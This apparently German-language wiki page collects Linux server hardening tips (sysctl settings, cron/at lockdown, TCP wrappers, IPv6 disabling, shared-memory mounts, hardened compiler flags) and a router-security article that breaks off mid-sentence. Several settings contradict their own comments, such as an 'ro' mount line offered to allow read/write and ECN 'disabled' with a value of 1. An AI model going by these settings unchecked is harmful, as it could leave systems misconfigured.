https://wiki.centos.org/HowTos/OS_Protection Now that we´ve restricted the login options for the server, lets kick off all the idle folks. To do this, we´re going to use a bash variable in /etc/profile. There are some reasonably trivial ways around this of course, but it´s all about layering the security. echo "Idle users will be removed after 15 minutes" echo "readonly TMOUT=900" >> /etc/profile.d/os-security.sh echo "readonly HISTFILE" >> /etc/profile.d/os-security.sh chmod +x /etc/profile.d/os-security.sh Beschränkungen für cron und at, https://wiki.centos.org/HowTos/OS_Protection In einigen Fällen möchten Aadministratoren oder andere vertrauenswürdige Benutzer Cronjobs oder zeitgesteuerte Skripte mit at starten. Um das zu verhindern, erzeuge man in /etc die Dateien cron.deny und at.deny mit den Namen aller blockierten Benutzer. Eine einfache Möglichkeit besteht in dem Parsen von /etc/passwd mit folgendem Skript: echo "Locking down Cron" touch /etc/cron.allow chmod 600 /etc/cron.allow awk -F: ´{print $1}´ /etc/passwd | grep -v root > /etc/cron.deny echo "Locking down AT" touch /etc/at.allow chmod 600 /etc/at.allow awk -F: ´{print $1}´ /etc/passwd | grep -v root > /etc/at.deny Lockdown Cronjobs Cron integriert ein Feature, mit dem angegeben werden kann, welche Benutzer erlaubt und welche nicht erlaubt sind, Cronjobs zu starten. Kontrolliert wird das mittels den Dateien /etc/cron.allow und /etc/cron.deny. Um einen Benutzer zu sperren oder zu erlauben, füge einfach dessen Namen in die Datei cron.deny bzw. cron.allow ein. Sollen alle Benutzer gesperrt werden, füge cron.deny die Zeile ´ALL´ hinzu. # echo ALL >> /etc/cron.deny Beispiele für Cron-Scheduling: https://www.tecmint.com/11-cron-scheduling-task-examples-in-linux/ Quelle: https://www.tecmint.com/linux-server-hardening-security-tips/ /proc/sys/* - Kernel-Parameter (Kernel-Flags) &Co.: Detaillierte Konfiguration sysctl.conf - Variablen sind Dateien aus /proc/sys Sysctl, https://wiki.centos.org/HowTos/OS_Protection Als nächstes verändere man /etc/sysctl.conf. Folgende Zeilen sollten enthalten sein: Wenn Sie mehrere Netzwerk-Schnittstellen haben, können einige davon Probleme verursachen. Daher sind sie auzutesten. Weitere Einzelheiten hierzu entnehme man dem Paket kernel-doc in der documentation/networking/ip-sysctl.txt. see /proc/sys or check actual settings by "sysctl -a" /etc/sysctl.conf # Kernel sysctl configuration file for Mandriva Linux / CentOS 6 # # For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and # sysctl.conf(5) for more details. net.ipv6.conf.lo.use_tempaddr = 0 # Disables IP dynaddr net.ipv4.ip_dynaddr = 1 # Disable ECN net.ipv4.tcp_ecn = 1 # Controls source route verification net.ipv4.conf.all.rp_filter =1 net.ipv4.conf.default.rp_filter = 1 # Do not accept source routing net.ipv4.conf.default.accept_source_route = 0 # Controls the System Request debugging functionality of the kernel kernel.sysrq =0 # kernel.exec-shield=1 # Controls whether core dumps will append the PID to the core filename. # Useful for debugging multi-threaded applications. kernel.core_uses_pid = 0 kernel.dmesg_restrict = 1 # If you set this variable to 1 then cd tray will close automatically when the # cd drive is being accessed. # Setting this to 1 is not advised when supermount is enabled # (as it has been known to cause problems) dev.cdrom.autoclose=1 # removed to fix some digital extraction problems dev.cdrom.check_media=1 # to be able to eject via the device eject button (magicdev) dev.cdrom.lock=0 # Disable netfilter on bridges. #net.bridge.bridge-nf-call-ip6tables = 0 #net.bridge.bridge-nf-call-iptables = 0 #net.bridge.bridge-nf-call-arptables = 0 net.ipv4.ip_forward =0 # Do not send ICMP redirects (we are not a router) net.ipv4.conf.all.send_redirects = 0 net.ipv4.conf.default.send_redirects = 0 net.ipv4.tcp_max_syn_backlog =512 # Do not accept IP source route packets (we are not a router) net.ipv4.conf.all.accept_source_route = 0 net.ipv4.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv4.conf.all.secure_redirects = 0 net.ipv4.conf.default.accept_source_route = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv4.conf.default.secure_redirects = 0 net.ipv4.tcp_syncookies = 1 net.ipv4.conf.all.log_martians = 1 net.ipv4.ip_local_port_range = 2000 65000 # Increase TCP max buffer size setable using setsockopt() net.ipv4.tcp_rmem = 4096 87380 8388608 net.ipv4.tcp_wmem = 4096 87380 8388608 net.ipv6.conf.eth0.disable_ipv6=1 net.ipv6.conf.default.router_solicitations=0 net.ipv4.tcp_syncookies = 1 net.ipv6.conf.default.accept_ra_rtr_pref=0 net.ipv6.conf.default.accept_ra_pinfo=0 net.ipv6.conf.default.accept_ra_defrtr=0 net.ipv6.conf.default.autoconf=0 net.ipv6.conf.default.dad_transmits=0 net.ipv6.conf.default.max_addresses=0 # # cat /proc/sys/net/ipv4/tcp_congestion_control # ls /lib/modules/´uname -r´/kernel/net/ipv4/ # modprobe tcp_htcp # modprobe tcp_cubic # modprobe tcp_bbr # net.core.default_qdisc=sch_fq_codel net.ipv4.tcp_congestion_control=cubic # BBR # net.core.default_qdisc=fq # net.ipv4.tcp_congestion_control=bbr # Increase Linux auto tuning TCP buffer limits # min, default, and max number of bytes to use # set max to at least 4MB, or higher if you use very high BDP paths net.core.rmem_max =212992 net.core.wmem_max =212992 net.core.rmem_default =212992 net.core.wmem_default =212992 net.core.netdev_max_backlog = 5000 # kernel.sysrq = 0 kernel.core_uses_pid = 1 fs.file-max=65535 kernel.pid_max=65536 net.ipv4.tcp_syncookies = 1 kernel.msgmnb = 65536 kernel.msgmax = 65536 kernel.shmmax = 3294967295 kernel.shmall = 3294967295 kernel.randomize_va_space = 2 net.ipv4.tcp_fin_timeout =3600 net.ipv4.tcp_keepalive_time =7200 net.ipv4.tcp_keepalive_probes =7 net.ipv4.tcp_syn_retries =6 net.ipv4.tcp_retries1 =1 net.ipv4.tcp_retries2 =3 net.ipv4.tcp_retrans_collapse =1 net.ipv4.tcp_sack =1 net.ipv4.ip_default_ttl =64 net.ipv4.ipfrag_time =30 net.ipv4.ip_no_pmtu_disc =0 net.unix.max_dgram_qlen =10 vm.overcommit_memory =2 vm.overcommit_ratio=200 vm.page-cluster =3 vm.oom_dump_tasks =0 vm.dirty_ratio=20 vm.dirty_writeback_centisecs=500 kernel.ctrl-alt-del =1 kernel.panic =0 kernel.acct =4 2 30 # Uncomment the following to stop low-level messages on console #kernel.printk = 3 4 1 3 kernel.printk =0 6 1 3 kernel.printk_ratelimit = 5 kernel.printk_ratelimit_burst = 60 kernel.shmall =-1 dev.raid.speed_limit_min =1000 dev.raid.speed_limit_max =200000 net.ipv4.conf.all.rp_filter=1 net.ipv4.tcp_window_scaling=1 net.ipv4.tcp_timestamps=0 net.ipv4.conf.all.log_martians=1 net.ipv4.icmp_echo_ignore_all=1 net.ipv4.icmp_echo_ignore_broadcasts=1 net.ipv4.icmp_ignore_bogus_error_responses=1 net.ipv4.tcp_congestion_control=cubic net.ipv4.conf.all.secure_redirects=1 net.ipv4.conf.all.shared_media=0 net.ipv4.conf.eth0.secure_redirects=1 net.ipv4.conf.eth0.shared_media=0 Teste sysctl.conf: sysctl -p /etc/sysctl.conf und starte das System neu (reboot). Gookens excellentes DNS-Sicherheits-Konzept vorweggenommen kurz und knapp (Einzelheiten siehe Exkurs weiter unten) aus "DNS-Surf-Maske" lokal (etc/hosts/) für grundlegende Domain-IP samt Ausschluss/Block, gefolgt von pdnsd (lokaler DNS-Proxy/Server mit einstellbarer Langzeitspeicherung) und schlie&slzig;lich tordns (anonymisierender DNS-Server vom Onion Router Tor, tor-resolve) IPv6 deaktivieren, https://help.ubuntu.com/community/StricterDefaults Ab Linux Kernel 2.6.28 ist IPv6 fester Bestandteil des Standard Kernels. Eine IPv6-Adresse ist unveränderbar und kann bei falscher Konfiguration zu Störungen im Netzwerkbetrieb und insbesondere bei DNS-Anfragen führen. IPv6 ist auf Ubuntu (by default) zunächst ermöglicht. Die meistene Firewalls (darunter LINFW3) beziehen sich aber auf IPv4 und ignorieren IPv6. Soll IPv6 nicht genutzt und das Laden zur Bootzeit des Systems verhindert werden, verändere in /etc/modprobe/aliases bzw. /etc/modprobe.conf alias (Namen) net-pf-10 ipv6 nach alias net-pf-10 off und führe einen Neustart aus. RedHat Enterprise Linux / CentOS / Fedora Core: In der Datei /etc/modprobe.conf die Zeile: alias net-pf-10 ipv6 in: alias net-pf-10 off alias ipv6 off ändern und den Rechner neustarten. RedHat Enterprise Linux / CentOS / Fedora Core / Mandriva: In die Datei /etc/sysconfig/network den folgenden Eintrag hinzufügen/ändern in: NETWORKING_IPV6="no" und USERCTL=no # Verhindert die Einwhahl durrch Benutzer ungleich Root. und den Rechner neustarten. IPv6 deaktivieren Soll das IPv6-Protokoll nicht verwendet werden, sollte man es deaktivieren. Die meisten Anwendungen, Policies ("Politiken") und Server erforden nicht das IPv6-Protokoll. Verände die Netzwerk-Konfigurationsdatei wie folgt: nano /etc/sysconfig/network NETWORKING_IPV6=no IPV6INIT=no https://www.tecmint.com/linux-server-hardening-security-tips/ IPv6 deaktivieren Dieser Artikel beschreibt wie Sie unter Linux und Windows den IPv6 Support deaktivieren bzw. ausschalten können. Dies kann aus Sicherheitsgründen sinnvoll sein, solange man IPv6 noch nicht produktiv einsetzt. Damit kann verhindert werden, dass man eine IPv6 Adresse erhält, sobald ein IPv6 Router Advertisement Daemon in einem Netz verfügbar ist. Außerdem sind bestehende Firewall Rules oft nicht für IPv6 gültig. In diesem Fall hätte man dann unter Umständen Dienste per IPv6 zugänglich die man eigentlich mit einer IPv4 Regel unterbunden hat. Unter Linux gibt es das eigene Kommando " ip6tables" zur Verwaltung der IPv6 Firewall Rules. 1 Ubuntu 2 RHEL / CentOS Ubuntu In Ubuntu 10.04, 12.04, 14.04 und 16.04 ist IPv6 direkt in den Kernel kompiliert und wird nicht als Modul geladen. Die einfachste Methode um IPv6 zu deaktivieren ist den passenden sysctl Parameter zu setzen. Temporär kann dies mit folgendem Kommando erfolgen: echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6 Um diese Einstellung dauerhaft vorzunehmen bietet es sich an auf die sysctl Funktionalitäten zurückzugreifen. Dafür einfach eine Datei namens /etc/sysctl.d/01-disable-ipv6.conf anlegen mit folgendem Inhalt: net.ipv6.conf.all.disable_ipv6 = 1 Nach dem nächsten Reboot ist IPv6 dann deaktiviert. Am besten kann dies mit dem Kommando "ip addr show" überprüft werden. Es darf dann keine Einträge mit dem Text "inet6" mehr geben. ip addr show | grep inet6 RHEL / CentOS Unter RHEL 6 / CentOS 6 kann die Deaktivierung von IPv6 ident wie unter Ubuntu via sysctl erfolgen (siehe oben). In RHEL 4 / CentOS 4 ist IPv6 als Modul integriert. Um dieses zu deaktiveren einfach folgende Zeile in der Datei /etc/modprobe.conf hinzufügen: install ipv6 /bin/false Die Überprüfung, ob es geklappt hat, kann mit dem Kommando "ip addr show | grep inet6" oder alternativ mit dem Kommando lsmod | grep -i ipv6 TCP-Wrapper, https://wiki.centos.org/HowTos/OS_Protection Nun sollten wir uns /etc/sysctl.conf ansehen und einige Änderungen machen. Der TCP-Wrapper liefert eine einfache und schnelle Methode für die Zugangskontrolle. Beispiele für von TCP-Wrappern bewussten Anwendungen sind sshd und Portmap. Im Folgenden soll ein Beispiel für Einschränkungen gegeben werden, in dem alles außer ssh geblockt wird. Dieses Beispiel blockt alles außer SSH: echo "ALL:ALL" >> /etc/hosts.deny echo "sshd:ALL" >> /etc/hosts.allow echo "ALL:ALL:DENY" >> /etc/hosts.allow Shared Memory (shm und tmpfs, siehe unsere /etc/fstab im noch Folgenden), https://help.ubuntu.com/community/StricterDefaults Ohne nährere Spezifikation wird /run/shm mit Lese- und Schreibzugriff (read/write) eingebunden ("gemountet") und mit der Möglichkeit zur Ausführung (execute). In den letzten Jahren berichteten viele Mail-Listen von Schwachstellen (Exploits), in denen /run/shm für Angriffe auf gestartete Dienste wie httpd genutzt worden ist. Wie auch immer, gingen die meisten dieser Exploits aus unsicheren Webanwendungen hervor, mehr als aus der Verwundbarkeit von Apache oder Distributionen wie Ubuntu. Es gibt einige wenige Gründe, in spezieller Konfiguration /run/shm read/write zu mounten wie die Echtzeit-Konfiguration eines Touchpads von Synaptics für Laptops, während sich für Server ud Desktop-Installationen kein Vorteil ergibt. Dennch, um Readwrite zu ermöglichen, editiere die Geräte-Konfiguraitonsdatei /etc/fstab durch Hinzufügen folgender Zeile: none /run/shm tmpfs defaults,ro 0 0 bzw. siehe http://joshrendek.com/2013/01/securing-ubuntu/ : Ein allgemeiner Exploit-Vektor reicht durch das Shared-Memory, der die UID gestarteter Programme und bösartige Aktionen durchführen kann. Außerdem kann /run/shm als ein Platz für Dateien angesehen werden, nachdem ein Einbruch ins System stattgefunden hat. Öffne /etc/fstab/ und setze: tmpfs /dev/shm tmpfs defaults,ro 0 0 Ein Neustart (Reboot) des Systems ist nun erforderlich. /run/shm ist danach im nur Lese-ReadOnly-Modus. Beachte, dass einige Programme dann nicht mehr arbeiten (z.B. Google Chrome). Gegebenenfalls belasse den Schreibzugriff, indem in /etc/fstab statt eben vorgestellter folgende Zeile hinzugefügt wird: none /run/shm tmpfs rw,noexec,nosuid,nodev 0 0 Nun wird /run/shm schreibbar eingebunden (gemountet), wenn auch ohne Erlaubnis für Ausführung von Programmen, dem Wechsel der UID laufender Programme und der Möglichkeit, block- oder zeichenbasierte Geräte zu erzeugen. Statt das System neu zu starten, kann man /run/shm mit dem Kommando "mount -o remount /run/shm" auch neu einbinden (remounten).. SSH-Einstellungen, https://help.ubuntu.com/community/StricterDefaults Während der SSH-Daemon für die meisten Leute sicher genug ist, legen einige auf mehr Sicherheit wert, indem Veränderungen an der Konfiguration von sshd vorgenommen werden: nano /etc/ssh/sshd Neustart von sshd: : service ssh restart (CentOS: sh /etc/init.d/sshd restart) ..., https://help.ubuntu.com/community/StricterDefaults . Konfiguration von bastille, http://joshrendek.com/2013/01/securing-ubuntu/ Das Bastille-Hardening-Programm "sperrt" das Betriebssystem mit dessen Konfiguration für zunehmende Sicherheit und mindert dessen Anfälligkeit für Kompromisse. Bastille kann außerdem den Hardening-Grad des Systems ermessen. File permissions module: Yes (suid) Disable SUID for mount/umount: Yes Disable SUID on ping: Yes Disable clear-text r-protocols that use IP-based authentication? Yes Enforce password aging? No (situation dependent, I have no users accessing my machines except me, and I only allow ssh keys) Default umask: Yes Umask: 077 Disable root login on tty 1-6: Yes Password protect GRUB prompt: No (situation dependent, I´m on a VPS and would like to get support in case I need it) Password protect su mode: Yes default-deny on tcp-wrappers and xinetd? No Ensure telnet doesn´t run? Yes Ensure FTP does not run? Yes display authorized use message? No (situation dependent, if you had other users, Yes) Put limits on system resource usage? Yes Restrict console access to group of users? Yes (then choose root) Add additional logging? Yes Setup remote logging, if you have a remote log host, I don´t so I answered No Setup process accounting? Yes Disable acpid? Yes Deactivate nfs + samba? Yes (situation dependent) Stop sendmail from running in daemon mode? No (I have this firewalled off, so I´m not concerned) Deactivate apache? Yes Disable printing? Yes TMPDIR/TMP scripts? No (if a multi-user system, yes) Packet filtering script? Yes Finished? YES! & reboot Programme deinstallieren (siehe auch unter Updaten): Wird sudo oder z. B. der rpcbind Portmapper, sshd SSH-Daemon, rsh, telnet, Avahi-Daemon oder der cups-browsed Daemon des CUPS Systems nicht benöt;tigt, kann man sie auch zunächst deaktivieren oder entfernen: "dpkg ..." , "rpm -e [nodeps]" Quelle: https://wiki.kairaven.de/open/os/linux/tuxsectune Quota Vorbereitung Mit Quota kann der Speicherplatzverbrauch für einzelne Benutzer und/oder Gruppen limitiert werden, so dass ein"Volllaufen" eines Volumes bzw. einer Partition verhindert wird. Für die Quotaverwendung muss der Kernel entsprechend konfiguriert sein. Ist CONFIG_QFMT_V2 als Modul eingestellt, wird das quota_v2.ko Kernelmodul in /etc/modules eingetragen: sudo echo quota_v2 >> /etc/modules Für die Quotaverwendung werden die entsprechenden Pakete installiert: sudo aptitude install quota quotatool Wird kein Quota auf per NFS eingehängten Dateisystemen bzw. RPC Quota-Server verwendet, kann der RPC Remote Quota Server Dienst deaktiviert werden: sudo systemctl disable quotarpc.service In der /etc/fstab Datei werden die Mountoptionen des /fs Dateisystems mit den Optionen zur Nutzung von Journaling Quota ergänzt: /etc/fstab /fs /mountpoint ext4 optionen, usrjquota=aquota.usr/grpjquota=aquota.group, jqfmt=vfsv0|1 Man kann mit usrjquota Quota für Benutzer und/oder mit grpjquota Quota für Gruppen einrichten. Bei Volumes mit einer Größe > 4TB wird das Quotaformat vfsv1 verwendet. Anschließend wird ein Neustart ausgeführt, falls das Dateisystem nicht mit dem folgenden Kommando neu eingehängt werden kann: sudo mount -o remount /mountpoint Kernel-Konfiguration Die Einstellungen beziehen sich auf Kernel 4.13 und 4.14 (derzeit 4.14.12). Generell sollte man alles deaktivieren, was nicht benötigt wird und benötigte Kernelmodule möglichst fest in den Kernel einbauen. Die Konfiguration ist auf einen Einzelplatzrechner mit "normaler" Benutzung für den Alltag ausgerichtet. Anwender mit speziellen Anforderungen oder Entwickler müssen natürlich davon abweichen und man sollte parallel einen Backup-Kernel installiert haben, falls Start und Betrieb des Kernels mit der Konfiguration fehlschlägt. Angaben mit K:string beziehen sich auf zusätzliche Parameter, die man auf der Kernel Kommandozeile bzw. in GRUB_CMDLINE_LINUX_DEFAULT der GRUB Konfiguration angibt. Einstellungen mit [?] weisen Probleme auf, sind fragwürdig oder Ansichtssache. Wie man unter Debian einen eigenen Kernel konfiguriert, kompiliert und installiert, kann im Debian Administrationshandbuch ab Einen Kernel kompilieren nachgelesen werden. Weitere Einzelheiten einschl. Module blockieren (alternativ direkt in den Skripten aus /etc/modules.d ) und Quelle: https://wiki.kairaven.de/open/os/linux/tuxsectune; wie man die Kernel-Quellen konfiguriert und eincompiliert, beschreiben wir noch, z.B. unter Updaten. Weitere Einzelheiten über quota und Quelle: https://wiki.kairaven.de/open/os/linux/tuxsectune Dienste mit systemd Entfernung und Deaktivierung Alle nicht benötigten Dienste sollten deaktiviert werden. Entweder werden zum Dienst zugeh&oml;rige Pakete gleich komplett deinstalliert oder - sofern eine Deinstallation nicht erfolgen soll - mittels systemctl (alternativ: ntsysv, chkconfig oder MCC#Systemdienste (mdv2010) deaktiviert. Weitere Sicherheitseinstellungen mit systemd (bzw. mittels "blacklist modulname" innerhalb der Konfigurationsdateien aus /etc/init.d) und Quelle: https://wiki.kairaven.de/open/os/linux/tuxsectune at & cron Zur Beschränkung, welche Benutzer außer root at, batch und cron Jobs erstellen und modifizieren dürfen, wird die /etc/at.allow und /etc/cron.allow Datei angelegt und in den beiden Dateien die Login-Namen der Benutzer zeilenweise aufgeführt, die eine entsprechende Berechtigung erhalten sollen. Gehärtetes Kompilieren Flags, die man dem configure-Skript übergeben kann. Executable ´CFLAGS= -g -O2 -fPIE -fstack-protector-strong -Wformat -Wformat-security -Werror=format-security´ ´CPPFLAGS= -D_FORTIFY_SOURCE=2´ ´CXXFLAGS= -g -O2 -fPIE -fstack-protector-strong -Wformat -Wformat-security -Werror=format-security´ ´LDFLAGS= -fPIE -pie -Wl,-z,relro -Wl,-z,now´ Shared Library ´CFLAGS= -g -O2 -fpic -fstack-protector-strong -Wformat -Wformat-security -Werror=format-security´ ´CPPFLAGS= -D_FORTIFY_SOURCE=2´ ´CXXFLAGS= -g -O2 -fpic -fstack-protector-strong -Wformat -Wformat-security -Werror=format-security´ ´LDFLAGS= -fpic -Wl,-z,relro -Wl,-z,now´ Geht Option "-fpic" nicht, benutze "-fPIC". Verlinke den DNS-Resolver nslookup mit dem anonymisierenden tor-resolve Auf Tor (The anonymizing Onion Router) kommen wir gegen Ende von Schritt 1 unseres Exkurses noch zu sprechen. Wird Tor bereits genutzt, kann das System gesichert werden, indem nslookup mit dem DNS-anonymisierenden Resolver tor-resolve verlinkt wird: Mache zunächst eine Kopie von nslookup: cp -f /usr/bin/nslookup /usr/bin/nslookup-save Verlinke nlookup mit tor-resolve: ln -sf /usr/bin/tor-resolve /usr/bin/nslookup. Dasselbe kann man mit den DNS-Resolvern host und dig machen. Für Programme, die damit nicht klar kommen, lassen sich die IP-Domain-Paare in /etc/hosts eintragen und /etc/nsswitch.conf entsprechend angepasst, siehe /etc/hosts-Datei gegen Ende unseres Exkurs. Beachte, dass die Ausgabe der drei Resolver nicht die gleiche ist. Dafür enthält sie stets die IP zur hinterfragten Domain. Bereits jetzt kann man das Setzen von ACL-Zugriffsrechten erwägen. Wie das geht, beschreiben wir noch in der Sektion für setfacl. Nehmen Sie diese Änderungen an Ihrem Router vor, um Sicherheitslücken zu schließen und die Internetgeschwindigkeit zu erhöhen, uncut-news.ch, 26.01.2024 Lassen Sie Ihren Router niemals in der Standardeinstellung. Unser Leben ist immer mehr mit dem Internet verknüpft, und die Sicherheit und der Schutz der Privatsphäre bei unseren Online-Aktivitäten sind von größter Bedeutung. Vor diesem Hintergrund gibt es eine wichtige, aber oft übersehene Komponente in unserem Zuhause, die eine entscheidende Rolle für unsere digitale Sicherheit spielt: der Heimrouter. Dieses unscheinbare Gerät ist das Tor, durch das unsere gesamte Online-Kommunikation läuft. Es ist ein Stück Technik, das in Haushalten auf der ganzen Welt allgegenwärtig ist, aber seine Bedeutung für den Schutz unserer digitalen Privatsphäre und Sicherheit wird oft unterschätzt. Ihr Router regelt den Internetverkehr für alle Geräte, die an Ihr Heimnetzwerk angeschlossen sind, wie Telefone, Laptops, Tablets, Konsolen und Smart-TVs. Ihr Router hat nicht nur Einfluss auf die Internetgeschwindigkeit aller angeschlossenen Geräte, sondern kann, wenn er nicht richtig konfiguriert ist, auch Sicherheitslücken aufweisen, die böswillige Akteure ausnutzen können, um Ihren Internetverkehr auszuspionieren. Glücklicherweise können Sie Ihren Router mit ein paar einfachen Schritten absichern und für die beste Geschwindigkeit und Verbindung optimieren. Zugang zu den Einstellungen Ihres Routers Um mit der Sicherung und Optimierung Ihres Routers zu beginnen, müssen Sie sich über Ihren Browser bei Ihrem Router anmelden. Geben Sie zunächst die Standardnetzwerkadresse Ihres Routers in die Adresszeile Ihres Browsers ein. Die häufigsten Router-Netzwerkadressen sind 192.168.1.1 und 192.168.0.1. Einige weniger gebräuchliche Router-Adressen sind 192.168.15.1 192.168.100.1 192.168.1.254 10.0.1.1 Wenn keine dieser Adressen funktioniert, überprüfen Sie, ob die Standardnetzwerkadresse auf Ihrem Router aufgedruckt oder in der offiziellen Dokumentation Ihres Routers angegeben ist. Die meisten Router stellen ihre offizielle Dokumentation auf ihren Support-Websites zur Verfügung. Hier finden Sie die Links zu den offiziellen Support-Websites für einige der gängigsten Router-Marken: ASUS Linksys Netgear Synology TP-Link Wenn Sie einen Router eines anderen Herstellers verwenden, suchen Sie nach "[Router-Hersteller] Support", "[Router-Hersteller] Dokumentation" oder "[Router-Hersteller] Login", um die entsprechende Dokumentation zu finden. Nachdem Sie die Standardnetzwerkadresse Ihres Routers gefunden und in die Adressleiste Ihres Browsers eingegeben haben, müssen Sie die Anmeldedaten Ihres Routers eingeben. Wenn Sie Ihre Zugangsdaten nicht kennen, versuchen Sie es mit dem Benutzernamen "admin" und dem Passwort "password". Sollte dies nicht funktionieren, überprüfen Sie, ob die Anmeldedaten auf Ihrem Router aufgedruckt sind oder in der offiziellen Dokumentation Ihres Routers stehen. Nachdem Sie sich erfolgreich angemeldet haben, können Sie mit der Sicherung und Optimierung Ihres Routers beginnen, indem Sie den Schritten in dieser Anleitung folgen. Jeder Schritt enthält eine allgemeine Anleitung zur Durchführung, aber der spezifische Prozess kann je nach Router variieren. Wenn Sie spezifische Anweisungen benötigen, lesen Sie die offizielle Dokumentation Ihres Routers oder besuchen Sie die Support-Website. Ändern Sie das Standardpasswort Ihres Routers. Da die meisten Router ein schwaches Standardpasswort verwenden, sollten Sie als erstes dieses schwache Standardpasswort in ein sicheres, eindeutiges Passwort ändern, um Ihren Router zu schützen. Die Option zum Ändern des Passworts finden Sie normalerweise in den Router-Einstellungen unter "Verwaltung", "Allgemein" oder "Drahtlos". Bei einigen Routern müssen Sie nur das neue Passwort eingeben, um Ihr Passwort zu ändern. Bei anderen Routern müssen Sie das alte und das neue Kennwort eingeben und das Kennwort bestätigen. Bei einigen Routern müssen Sie auch Sicherheitsfragen und -antworten eingeben. Wenn Sie aufgefordert werden, Sicherheitsfragen und -antworten einzugeben, ist es am besten, die Antworten als zufällige Passwörter festzulegen und sie in einem Passwortmanager zu speichern, um zu verhindern, dass sie durch Social-Engineering-Angriffe aufgedeckt werden. Ändern Sie den voreingestellten öffentlichen Namen (SSID) Ihres Routers. Der voreingestellte öffentliche Name oder Service Set Identifier (SSID) Ihres Routers enthält oft verräterische Informationen wie die Marke und Modellnummer Ihres Routers oder den Namen Ihres Internet Service Providers (ISP). Wenn Sie den öffentlichen Namen Ihres Routers in einen weniger aufschlussreichen Namen ändern, z. B. in ein zufälliges Wort oder eine Phrase, können Sie es böswilligen Angreifern oder Netzwerk-Schnüfflern erschweren, das Modell Ihres Routers herauszufinden. Die Option zum Ändern des Routernamens befindet sich in der Regel im Abschnitt "Erweitert" oder "Drahtlos" in den Einstellungen Ihres Routers. WPA3-AES-Verschlüsselung verwenden Wireless Protected Access 3-Advanced Encryption Standard 3 (WPA3-AES) ist einer der sichersten drahtlosen Verschlüsselungsstandards, und Sie sollten sicherstellen, dass Ihr Router diesen Standard verwendet, sofern er unterstützt wird. Falls Ihr Router WPA3-AES nicht unterstützt, verwenden Sie WPA2-AES. Die Option zum Überprüfen und Ändern des drahtlosen Verschlüsselungsstandards Ihres Routers befindet sich normalerweise im Abschnitt "Erweitert", "Drahtlos" oder "Drahtlose Sicherheit" der Router-Einstellungen. Deaktivieren Sie UPnP Universal Plug and Play (UPnP) ermöglicht es jedem Programm in Ihrem lokalen Netzwerk, Ports auf der Firewall Ihres Routers zu öffnen und Verbindungen zu Geräten außerhalb des Netzwerks herzustellen. In der Regel ist UPnP bei Routern standardmäßig aktiviert, da es neuen Geräten ermöglicht, sich automatisch dem Netzwerk anzuschließen und mit anderen Geräten zu verbinden. Milliarden von Geräten sind jedoch von den UPnP-Schwachstellen betroffen, und durch Deaktivieren von UPnP können Sie Ihr Netzwerk vor diesen Schwachstellen schützen. Die Option zum Deaktivieren von UPnP finden Sie in der Regel in den Einstellungen Ihres Routers unter "Erweitert", "Drahtlos" oder "Drahtlose Sicherheit". In den meisten Fällen wird die Deaktivierung von UPnP keine Probleme verursachen. Sollten jedoch Probleme mit bestimmten Anwendungen, Geräten oder Diensten auftreten, können Sie manuell Ports für diese Anwendungen, Geräte oder Dienste öffnen und an diese weiterleiten. Die Option zum manuellen Öffnen von Ports befindet sich in der Regel in den Abschnitten "Erweitert", "Anwendungen und Spiele", "Netzwerk", "Netzwerkcenter", "Portweiterleitung", "Port-Triggering", "Virtuelle Server", "WAN" oder "Sicherheit" in den Einstellungen Ihres Routers. Sobald Sie die Option zum manuellen Öffnen von Ports auf Ihrem Router gefunden haben, müssen Sie die TCP- und UDP-Ports finden, auf die die spezifische Anwendung, das Gerät oder der Dienst weitergeleitet werden soll, und diese Portdetails beim Öffnen des Ports auf Ihrem Router eingeben. Sie können diese Portdetails finden, indem Sie nach [Name der Anwendung/des Geräts/des Dienstes] Portweiterleitung suchen. Ändern Sie Ihren Standard-DNS Jedes Mal, wenn Sie eine Verbindung zu einer Website oder einem Online-Dienst herstellen, ruft Ihr Gerät einen Domain Name Server (DNS) auf, um den Domainnamen in die für die Verbindung erforderliche Internetprotokolladresse (IP) zu übersetzen. Standardmäßig verwendet Ihr Router den DNS, der von Ihrem Internetdienstanbieter bereitgestellt wird. Diese vom ISP bereitgestellten Server sind jedoch oft langsamer als Alternativen und ermöglichen dem ISP, den Zugriff auf Websites auf DNS-Ebene zu blockieren. Durch die Wahl eines schnellen, datenschutzfreundlichen DNS, z. B. 1.1.1.1 von Cloudflare, können Sie die DNS-Blockierung durch Ihren Internetanbieter vermeiden und von einer höheren Surfgeschwindigkeit profitieren. Um Ihren Standard-DNS zu ändern, erhalten Sie die DNS-Serverdetails von Ihrem bevorzugten DNS-Anbieter. Die DNS-Server-Details für Cloudflare 1.1.1.1 finden Sie hier. Ändern Sie dann den Standard-DNS-Server in den Einstellungen Ihres Routers. Die Option zum Ändern des DNS befindet sich in der Regel unter "Erweitert", "Konnektivität", "Lokales Netzwerk", "Internet", "IPv6", "Netzwerk", "Netzwerkcenter" oder "WAN" in den Einstellungen Ihres Routers. Wi-Fi-Kanalbreite einstellen Wi-Fi arbeitet auf zwei Frequenzen - 2,4 Gigahertz (GHz) und 5 GHz. Jede dieser Frequenzen ist in mehrere Kanäle aufgeteilt. Durch Einstellen der Wi-Fi-Kanalbreite können Sie die Verbindungsgeschwindigkeit verbessern oder Störungen reduzieren. Die Option zum Überprüfen und Ändern der aktuellen Wi-Fi-Frequenz und Kanalbreite finden Sie in der Regel im Abschnitt "Erweitert", "Wi-Fi-Verbindung" oder "Drahtlos" in den Einstellungen Ihres Routers. Wenn Sie in einem Bereich wohnen, in dem viel Platz zwischen Ihnen und anderen Wi-Fi-Netzwerken ist (z. B. in einem Haus mit viel Platz zwischen den Nachbarn), versuchen Sie, die Kanalbreite (einige Router nennen dies "Bandbreite") auf 40 MHz zu ändern, wenn Ihre Wi-Fi-Frequenz 2,4 GHz beträgt, oder auf 80 MHz, wenn Ihre Frequenz 5 GHz beträgt, und sehen Sie, ob sich Ihre Wi-Fi-Geschwindigkeit dadurch verbessert. Wenn es in Ihrer Nähe viele Wi-Fi-Netzwerke gibt (z. B. in einem Mehrfamilienhaus) und Sie Probleme mit Interferenzen haben, versuchen Sie, die Kanalbreite auf 20 MHz zu ändern, wenn Ihre Wi-Fi-Frequenz 2,4 GHz beträgt, oder auf 40 MHz, wenn Ihre Wi-Fi-Frequenz 5 GHz beträgt. Wi-Fi 6 aktivieren Wenn Sie Wi-Fi 6, den neuesten Wi-Fi-Standard, auf Ihrem Router aktivieren, können Sie Ihre 